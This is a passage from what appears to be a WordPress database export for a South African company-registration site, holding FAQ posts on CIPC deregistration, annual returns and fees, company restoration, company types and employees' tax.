not registered for tax)</li>\r\n</ul>\r\n<ul>\r\n 	<li>If the company or close corporation submits the request, the letter must be signed by each active director, or otherwise by the person who is requesting the deregistration;</li>\r\n 	<li>Tax number (if available); and</li>\r\n 	<li>Certified ID copy of any of the persons signing the letter wherein deregistration is required.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2761\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Who may request the deregistration of a company or close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-2761\" class=\"ccm-remo-expand-content box\">\r\n\r\nAny person, organ of state or the company or close corporation itself.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2762\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is a public company?</span></div>\r\n<div id=\"ccm-remo-expand-content-2762\" class=\"ccm-remo-expand-content box\">\r\n\r\nPublic companies are comparable to companies of the same status under the Companies Act, 1973. They are characterised by the following:\r\n• Their MOI permits them to offer shares to the public but restricts limits or negates their right of pre-emption.\r\n• The name of a public company must end with the word “Limited” or its abbreviation, “Ltd”.\r\n• A public company must have at least three directors.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3550\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is the ground for deregistration?</span></div>\r\n<div id=\"ccm-remo-expand-content-3550\" class=\"ccm-remo-expand-content box\">\r\n\r\nA company or close corporation may be referred for deregistration:-\r\n<ul>\r\n 	<li>upon application by any party subject to the requirements for a request for deregistration,</li>\r\n 	<li>if annual returns are outstanding for more than 2 successive years,  or</li>\r\n 	<li>if the Commission believes that the company or close corporation has been inactive for 7 years.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-2765\" class=\"ccm-remo-expand-content box\">\r\n\r\n<span style=\"color: #800080;\">Will CIPC provide notification of the pending de-registration?</span>\r\n\r\nYes. During the deregistration process notifications are mailed to the company or close corporation’s registered postal address as per CIPC records, informing it of the intended deregistration and a request to either provide confirmation that it is still active or to file outstanding annual returns.  At the time of notification, the company or close corporation’s legal persona is not yet removed.  The notification only serves to inform the company or close corporation of the intention to deregister it, if no objection or filing of annual returns occurs.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3553\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Is it possible to object to the deregistration process?</span></div>\r\n<div id=\"ccm-remo-expand-content-3553\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>Yes</strong>.\r\n\r\nIf deregistration is due to annual return non compliance, the de-registration process will be cancelled if all outstanding annual returns are filed while it is still in such status. If the cause for deregistration is any other reason, a written objection to the de-registration must be filed by posting or hand delivering the objection to CIPC.  This objection must be addressed to the Deregistration Unit of CIPC. (the cancellation letter  with the certified ID copy of applicant can be emailed to the unit as well)\r\n\r\nOnce a company or close corporation is “final deregistered” no Annual Return or objection can be processed.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3552\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How long does the de-registration process takes?</span></div>\r\n<div id=\"ccm-remo-expand-content-3552\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe deregistration process, depending on the cause of deregistration, may take up to 3 months.\r\n\r\n</div>\r\n</div>','Deregistration of your Company or Close Corporation at CIPC','','publish','open','open','','deregistrations','','','2016-12-01 12:38:40','2016-12-01 10:38:40','',0,'https://companyregistration.online/?p=324',0,'post','',0),(329,2,'2016-04-08 13:32:42','2016-04-08 11:32:42','<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3554\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Will my personal detail as a director or member be disclosed on the annual return?</span></div>\r\n<div id=\"ccm-remo-expand-content-3554\" class=\"ccm-remo-expand-content box\">\r\n\r\nDue to security concerns relating to the disclosure of personal information CIPC has affected the following changes relating to annual returns:\r\n<ul>\r\n	<li>Only the first 6 digits of a director’s or member’s identity number will be displayed; and</li>\r\n	<li>The annual return filing certificate will not display the identity number, addresses, or contact details     of  a director or member.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3555\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Will I be able to update any details of the company or close corporation on the annual return?</span></div>\r\n<div id=\"ccm-remo-expand-content-3555\" class=\"ccm-remo-expand-content box\">\r\n\r\nOnly the following fields of the entity are updateable:\r\n<ul>\r\n	<li>email address;</li>\r\n	<li>telephone number;</li>\r\n	<li>cell phone number;</li>\r\n	<li>website address;</li>\r\n	<li>business description; and</li>\r\n	<li>principal place of business.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3556\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is the purpose of filing a company or close corporation annual return?</span></div>\r\n<div id=\"ccm-remo-expand-content-3556\" class=\"ccm-remo-expand-content box\">\r\n\r\nAll companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.\r\n\r\nTherefore, if annual returns are not filed within the prescribed time period, the assumption is that the company or close corporation is inactive, and as such CIPC will start the deregistration process to remove the company or close corporation from its active records. The legal effect of the deregistration process, is that the juristic personality is withdrawn and the company or close corporation ceases to exist.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3557\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is meant by business description?</span></div>\r\n<div id=\"ccm-remo-expand-content-3557\" class=\"ccm-remo-expand-content box\">\r\n\r\nIt is the industry that the company or close corporation mainly operated in for the annual return period, for example construction, catering, cleaning services, import/export, transport, financial sector, investment, mining, agriculture, marketing.  The indicated examples are not an inclusive list of all industries.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3558\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is meant by principal place of business?</span></div>\r\n<div id=\"ccm-remo-expand-content-3558\" class=\"ccm-remo-expand-content box\">\r\n\r\nIt is the primary address from which the company or close corporation conduct its business.  It may not necessarily be the same as the registered office.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2707\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Who may file an annual return on behalf of a company or close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-2707\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe Companies Act, 2008 and the Close Corporations Act, 1984 require the company or close corporation itself, (it also include its authorised representative) to file the annual return.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3561\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If a company or close corporation has filed its tax returns with SARS, is it still required to file annual returns with CIPC?</span></div>\r\n<div id=\"ccm-remo-expand-content-3561\" class=\"ccm-remo-expand-content box\">\r\n\r\n<span style=\"color: #800080;\">A clear distinction must be made</span> between an annual return and a tax return.  An annual return is a sort of “renewal” and has the purpose to confirm whether CIPC is in possession of the most up to date information of a company or close corporation and that the company or close corporation is still conducting business.  A tax return focuses on taxable income of a company or close corporation in order to determine the tax liability of the company or close corporation to the State and is filed with SARS.\r\n\r\nCompliance with the one does not mean that there is automatic compliance with the other.  It is two different processes administered in terms of different legislation by two different government departments.  Therefore, even if the tax return has been filed with SARS, the annual return must still be filed with CIPC.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3562\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Will the annual return replace the filing of other prescribed or statutory forms?</span></div>\r\n<div id=\"ccm-remo-expand-content-3562\" class=\"ccm-remo-expand-content\">\r\n\r\n<strong>No. </strong>\r\n\r\nAn annual return is not an amendment form and therefore, the annual return must be followed by the appropriate statutory form to update the CIPC registers after filing if CIPC is not in possession of the most up to date information.  An example of this is if the company address changes, a form must still be completed and submitted to CIPC.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3563\" class=\"ccm-remo-expand-title ccm-remo-expand-closed\" data-expander-speed=\"500\">Should all annual returns be up to date before a close corporation converts to a company?</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3564\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Should all annual returns be up to date if the company converts from one category of company to the other?</div>\r\n<div id=\"ccm-remo-expand-content-3564\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>No.</strong>\r\n\r\nThe company does not have to be up to date with annual returns before converting but it should not be in “deregistration process” or “final deregistered”.  If in “deregistration process” the company must first object to deregistration in writing (if not due to annual return non compliance) or file all outstanding annual returns (if due to annual return non compliance) before applying to convert.\r\n\r\nIf the company is final deregistered it must first be re-instated.  Kindly refer to the Re-instatement section of the FAQ’s for the requirements to apply for re-instatement.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3566\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What sections of the legislation governs annual returns?</span></div>\r\n<div id=\"ccm-remo-expand-content-3566\" class=\"ccm-remo-expand-content box\">\r\n<h3>Companies:</h3>\r\n<strong>Filing Requirement:</strong>\r\n<ul>\r\n	<li>Section 33 of Companies Act</li>\r\n	<li>Regulation 30 of Companies Regulations</li>\r\n</ul>\r\n<strong>Deregistration Requirement:</strong>\r\n<ul>\r\n	<li>Section 82(3) of Companies Act</li>\r\n	<li>Regulation 40 of the Companies Regulations</li>\r\n</ul>\r\n<strong>Re-instatement Requirement:</strong>\r\n<ul>\r\n	<li>Section 82(4) of Companies Act</li>\r\n	<li>Regulation 40 of the Companies Regulations</li>\r\n</ul>\r\n<strong>Filing of Financial Information:</strong>\r\n<ul>\r\n	<li>Section 30 of Companies Act</li>\r\n	<li>Regulation 40 (2) – (4) of Companies Regulation</li>\r\n	<li>Regulations 28 and 29 of Companies Regulations</li>\r\n</ul>\r\n<h3>Close Corporations</h3>\r\n<strong>Filing Requirement:</strong>\r\n<ul>\r\n	<li>Section 15A of Close Corporations Act</li>\r\n	<li>Regulation 16 of the Close Corporations Administrative Regulations</li>\r\n</ul>\r\n<strong>Deregistration Requirement:</strong>\r\n<ul>\r\n	<li>Section 82(3) of Companies Act</li>\r\n	<li>Regulation 40 of the Companies Regulations</li>\r\n</ul>\r\n<strong>Re-instatement Requirement:</strong>\r\n<ul>\r\n	<li>Section 82(4) of Companies Act</li>\r\n	<li>Regulation 40 of the Companies Regulations</li>\r\n</ul>\r\n<strong>Filing of Financial Information:</strong>\r\n<ul>\r\n	<li>Section 30 of Companies Act</li>\r\n	<li>Item 5 of Schedule 5 of Companies Act (relating to the amendments of section 58 of Close Corporations Act)</li>\r\n	<li>Regulation 40 (2) – (4) of Companies Regulation</li>\r\n	<li>Regulations 28 and 29 of Companies Regulations</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3568\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What fee should be paid when filing annual returns?</span></div>\r\n<div id=\"ccm-remo-expand-content-3568\" class=\"ccm-remo-expand-content box\">\r\n\r\nIn determining the appropriate fee for the filing of an annual return, a distinction must be made between a company and close corporation filing, and the date on which the annual return became due, since different fee structures are used for companies and close corporations. Further, in order to determine the year from which the company or close corporation became liable to file annual returns, the roll out date for the specific category of entity must be used together with its registration date.\r\n<ul>\r\n	<li>Public and external companies – rolled out August 2003</li>\r\n	<li>Private and incorporated companies – rolled out May 2005</li>\r\n	<li>Close corporations – rolled out September 2008</li>\r\n	<li> Non profit companies – rolled out May 2011</li>\r\n</ul>\r\n<table class=\"responsivetable\">\r\n<tbody>\r\n<tr>\r\n<td><strong>Examples (Companies)</strong></td>\r\n<td><strong>Examples (Close Corporations)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>The company was registered on 26 June 1995. If it is a public or external company, its first annual return became due in June 2003. Therefore, annual returns should have been filed on an annual basis as from June 2004 until June 2011, and should then continue to be filed annually every year thereafter.\r\n\r\nIf the company is a private company, its first annual return became due June 2005. Therefore, annual returns should have been filed on an annual basis as for June 2005 to June 2011, and every year thereafter.\r\n\r\nIf the company was registered 26 June 2009 and it is any other type of company, the first annual return became due in June 2010. Therefore, annual returns should have been filed on an annual basis for June 2010 and June 2011, and every year thereafter. If the close corporation was registered on 26 June 1995, its first annual return became due in June 2009. Therefore, annual returns should have been filed on an annual basis for June 2009 to June 2011, and every year thereafter.</td>\r\n<td>If the <strong>close corporation</strong> was registered on 26 June 1995, its first annual return became due in <strong>June 2009</strong>. Therefore, annual returns should have been filed on an annual basis for June 2009 to June 2011, and every year thereafter.\r\n\r\nIf the close corporation was registered on 26 June 2009, its first annual return became due in June 2010. Therefore, annual returns should have been filed on an annual basis for June 2010 and June 2011, and every year thereafter.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nIf the annual return became due 1 May 2011 or thereafter, the fee structure under the Companies Act, 2008 must be used. If it became due before 1 May 2011 the Companies Act, 1973 fee structure must be used.\r\n\r\n&nbsp;\r\n\r\n<strong>Companies Act, 1973 fee table:</strong>\r\n<table class=\"responsivetable\">\r\n<tbody>\r\n<tr>\r\n<td><strong>Annual Turnover</strong></td>\r\n<td><strong>Private and Incorporate Companies</strong></td>\r\n<td><strong>Public Companies</strong></td>\r\n<td><strong>External Companies</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Less than R10 million</td>\r\n<td>R450.00</td>\r\n<td>R 4000.00</td>\r\n<td>R 4000.00</td>\r\n</tr>\r\n<tr>\r\n<td>More than R10 million but less than R50 million</td>\r\n<td>R 2500.00</td>\r\n<td>R 4000.00</td>\r\n<td>R 4000.00</td>\r\n</tr>\r\n<tr>\r\n<td>R50 million or more</td>\r\n<td>R 4000.00</td>\r\n<td>R 4000.00</td>\r\n<td>R 4 000.00</td>\r\n</tr>\r\n<tr>\r\n<td>Penalty fee for each late lodgment</td>\r\n<td>R 150.00</td>\r\n<td>R 150.00</td>\r\n<td>R 150.00</td>\r\n</tr>\r\n<tr>\r\n<td>Re-instatement Application (Form CoR40.5)</td>\r\n<td colspan=\"3\">R 2000</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><strong>Companies Act, 2008 fee table:</strong></strong>\r\n<table class=\"responsivetable\">\r\n<tbody>\r\n<tr>\r\n<td><strong>Annual Turnover</strong></td>\r\n<td><strong>Filing within 30 business days after annivessary date</strong></td>\r\n<td><strong>Filing more than 30 business days after anniversary date</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Less than R1 million</td>\r\n<td>R 100.00</td>\r\n<td>R 150.00</td>\r\n</tr>\r\n<tr>\r\n<td>R1 million but less than R10 million</td>\r\n<td>R 450.00</td>\r\n<td>R 600.00</td>\r\n</tr>\r\n<tr>\r\n<td>R10 million but less than R25 million</td>\r\n<td>R 2000.00</td>\r\n<td>R 2500.00</td>\r\n</tr>\r\n<tr>\r\n<td>R25 million or more</td>\r\n<td>R 3000.00</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Re-instatement Application (Form CoR40.5)</td>\r\n<td colspan=\"2\">R 200.00</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Close Corporations Act, 1984 fee table:</strong>\r\n<table class=\"responsivetable\">\r\n<tbody>\r\n<tr>\r\n<td><strong>Annual Turnover</strong></td>\r\n<td><strong>Filing within 2 months from beginning of anniversary month</strong></td>\r\n<td><strong>Penalty for each late lodgment</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Between 0 to R50 million</td>\r\n<td>R 100.00</td>\r\n<td>R 150.00</td>\r\n</tr>\r\n<tr>\r\n<td>R50 million and above</td>\r\n<td>R 4000.00</td>\r\n<td>R 150.00</td>\r\n</tr>\r\n<tr>\r\n<td>Re-instatement Application</td>\r\n<td colspan=\"2\">R 200.00</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3569\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a company or close corporation request exemption for the filing and payment of annual returns?</span></div>\r\n<div id=\"ccm-remo-expand-content-3569\" class=\"ccm-remo-expand-content box\">\r\n\r\nA company or close corporation is mandated by law to file annual returns annually and therefore, CIPC cannot exempt companies and close corporations from filing/complying with such requirement.\r\n\r\nThe prescribed filing fees for annual returns are legislated, and therefore such cannot be waived by the CIPC.  The CIPC also cannot make arrangements for payment of annual returns in “installments” since the prescribed fee must accompany the filing.  If the prescribed fee does not accompany the filing, the filing is invalidated and must be refiled.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3570\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If the company or close corporation was dormant/inactive for an annual return period, should it still file and pay annual returns?</span></div>\r\n<div id=\"ccm-remo-expand-content-3570\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>Yes.</strong>\r\n\r\nThe Close Companies Act, 2008  and Corporations Act, 1984 does not make a distinction between an active and inactive company or close corporation.  Therefore, even if the company or close corporation was inactive, it is still legally required to file and pay annual returns.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3572\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">The incorrect turnover was provided when the annual return was filed, how can that be corrected?</span></div>\r\n<div id=\"ccm-remo-expand-content-3572\" class=\"ccm-remo-expand-content box\">\r\n\r\nOnce an annual return is filed, none of the information provided can be updated.  In cases where the incorrect turnover has been provided the customer code used for the original filing may be issued with either a credit note (indicated turnover larger than the actual turnover) or a debit note (indicated turnover less than the actual turnover).\r\n\r\n<span style=\"color: #800080;\">In order for CIPC to credit/debit the customer code the following documents are required:-</span>\r\n<ol>\r\n	<li>the financial statements for the annual return year in question,</li>\r\n	<li>the entity name, registration number and the annual return year in question,</li>\r\n	<li>indication of the reason for the incorrect turnover being provided,</li>\r\n	<li>certified ID copy of the owner of the customer code used to file the annual return, and</li>\r\n	<li>a letter providing permission to the CIPC to credit/debit the difference.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2732\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Which set of financial statements should be used to determine the turnover of the company or close corporation for purposes of filing annual returns?</span></div>\r\n<div id=\"ccm-remo-expand-content-2732\" class=\"ccm-remo-expand-content box\">\r\n\r\nA company or close corporation must use its latest approved financial statements for purposes of determining the turnover for purposes of filing annual returns.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2733\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How do I determine the entity’s turnover?</span></div>\r\n<div id=\"ccm-remo-expand-content-2733\" class=\"ccm-remo-expand-content box\">\r\n\r\nTurnover of an entity is the amount of money taken by a company or close corporation during its financial year.   Roughly stated, the turnover of the company or close corporation is its revenue or income for the financial year.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3575\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Will CIPC provide notification of the pending deregistration?</span></div>\r\n<div id=\"ccm-remo-expand-content-3575\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>Yes.</strong>\r\n\r\nDuring the deregistration process notifications are mailed to the company or close corporation’s registered postal address as per CIPC records, informing it of the intended deregistration and a request to either provide confirmation that it is still active or to file outstanding annual returns.  At the time of notification, the company or close corporation’s legal persona is not yet removed.  The notification only serves to inform the company or close corporation of the intention to deregister it, if no objection or filing of annual returns occurs.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3576\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can deregistration be cancelled if the company or close corporation has been placed in deregistration due to annual return non compliance?</span></div>\r\n<div id=\"ccm-remo-expand-content-3576\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>Yes. </strong>\r\n\r\nIf deregistration is due to annual return non compliance, deregistration process will be cancelled if all outstanding annual returns are filed while it is still in such status. If the cause for deregistration is any other reason, a written objection to deregistration must be filed by posting or hand delivering the objection to CIPC.  This objection must be addressed to the Deregistration Unit of CIPC.\r\n\r\nOnce a company or close corporation is “final deregistered” no annual return or objection can be processed.\r\n\r\nIt is advised that the objection be posted by registered mail to CIPC in order to act as proof that the objection was received by CIPC and should have been processed.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3577\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If the company or close corporation was deregistered for non compliance with annual returns, can the company or close corporation still be re-instated (restored)?</span></div>\r\n<div id=\"ccm-remo-expand-content-3577\" class=\"ccm-remo-expand-content box\">\r\n\r\n<strong>Yes. </strong>\r\n\r\nOnce a company or close corporation has been finally deregistered, the company or close corporation or any third person may apply for re-instatement upon filing of a  and if required, supporting documents. Upon the processing of the re-instatement application, the status will be changed to “in re-instatement process”.\r\n\r\n</div>\r\n</div>','Annual Returns','','publish','open','open','','annual-returns','','','2016-04-08 13:37:03','2016-04-08 11:37:03','',0,'https://companyregistration.online/?p=329',0,'post','',0),(335,2,'2016-04-08 13:46:41','2016-04-08 11:46:41','<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2744\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If the company or close corporation was deregistered, can the company or close corporation still be re-instated (restored)?</span></div>\r\n<div id=\"ccm-remo-expand-content-2744\" class=\"ccm-remo-expand-content box\">\r\n\r\nYes, but only if proved that the entity was holding property or was active at the time of deregistration.  Once a company or close corporation has been “finally deregistered”, the company or close corporation or any other person may apply for re-instatement upon filing of a form and supporting documents. Upon the processing of the re-instatement application, the status will be changed to ”re-instatement process”\r\n\r\n<span style=\"color: #800080;\">What is the requirement for re-instating (restoring) a company or close corporation if it was deregistered due to non compliance with annual returns?</span>\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-2746\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe same requirement as per a normal deregistration is applicable.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"> <span style=\"color: #800080;\">Who qualifies as the applicant in terms of the re-instatement application form?</span></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-3585\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe applicant may either be,\r\n<ul>\r\n 	<li>The Directors/members of the company or close corporation,</li>\r\n 	<li>A third person who has an interest in the re-instatement of the company or close corporation,</li>\r\n 	<li>The duly authorised representative of the directors/member/third person.</li>\r\n</ul>\r\nThe person, whose customer code is used to file and affect payment, may not necessarily be the director/member/third person/representative.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2759\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How would I know whether the re-instatement application has been processed?</span></div>\r\n<div id=\"ccm-remo-expand-content-2759\" class=\"ccm-remo-expand-content box\">\r\n\r\nA confirmation letter and certificate will be forwarded to the details of the person whose customer code was used.\r\n\r\n</div>\r\n</div>','Restoration of a Company or Close Corporation','','publish','open','open','','restorations','','','2016-12-01 12:41:21','2016-12-01 10:41:21','',0,'https://companyregistration.online/?p=335',0,'post','',0),(357,1,'2016-04-18 15:27:02','2016-04-18 13:27:02','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.22\"][et_pb_row admin_label=\"row\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.26.6\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]<p><strong>What type of companies that can be registered</strong> in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC) </li>\n</ul>\n<p><strong>What is a private company</strong><br />Private companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:</p>\n<p>They are subject to fewer disclosure and transparency requirements.<br /> A private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.<br /> The name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.<br /> The board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.</p>\n<p>&nbsp;</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registration FAQs','','publish','closed','open','','company-registration-faqs','','','2019-08-15 09:49:53','2019-08-15 07:49:53','',0,'https://companyregistration.online/?p=357',0,'post','',0),(366,1,'2016-04-10 19:18:11','0000-00-00 00:00:00','<script type=\"text/javascript\" src=\"https://registermybusiness.mautic.com/form/generate.js?id=2\"></script>','Free report mautic form','','draft','closed','closed','','','','','2016-04-10 19:18:11','2016-04-10 17:18:11','',0,'https://companyregistration.online/?page_id=366',0,'page','',0),(369,1,'2016-04-15 15:34:40','2016-04-15 13:34:40','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.2.1\"]\r\n\r\nEmployees’ Tax refers to the tax required to be deducted by an employer from an employee’s remuneration paid or payable. The process of deducting or withholding tax from remuneration as it is earned by an employee is commonly referred to as PAYE.\r\n\r\nAn employer who is registered or required to register with SARS for PAYE and/or Skills Development Levy (SDL) purposes, is also required to register with SARS for the payment of Unemployment Insurance Fund (UIF) contributions to SARS.\r\n\r\n1 September 2015 - Employer Interim Reconciliation is open from 1 September to 30 October 2015 for the period 1 March to 31 August 2015\r\n1 September 2015 - PAYE Reconciliation Communication: Clarification for August 2015 IRP5/IT3(a) Certificates\r\n\r\nThe amounts deducted or withheld must be paid by the employer to SARS on a monthly basis, by completing the Monthly Employer Declaration (EMP201). The EMP201 is a payment declaration in which the employer declares the total payment together with the allocations for PAYE, SDL, UIF and/or Employment Tax Incentive (ETI), if applicable. A unique Payment Reference Number (PRN) will be pre-populated on the EMP201, and will be used to link the actual payment with the relevant EMP201 payment declaration\r\n\r\nHow and when should it be paid? It must be paid within seven days after the end of the month during which the amount was deducted. If the last day for payment falls on a public holiday or weekend, the payment must be made on the last business day before the public holiday or weekend.\r\n\r\nThe following payment methods are available:\r\n<ul>\r\n 	<li>Electronic payments through the internet (EFT)</li>\r\n 	<li>At a branch of one of the relevant approved banking institutions. Cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.</li>\r\n 	<li>At a specific SARS branch, cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.</li>\r\n</ul>\r\n<h4>Note:</h4>\r\nEmployers who pay, or are likely to pay Employees’ Tax exceeding R10 million in any 12-month period, must submit Employees’ Tax declarations and make payments electronically.\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Employees’ Tax [PAY-AS-YOU-EARN 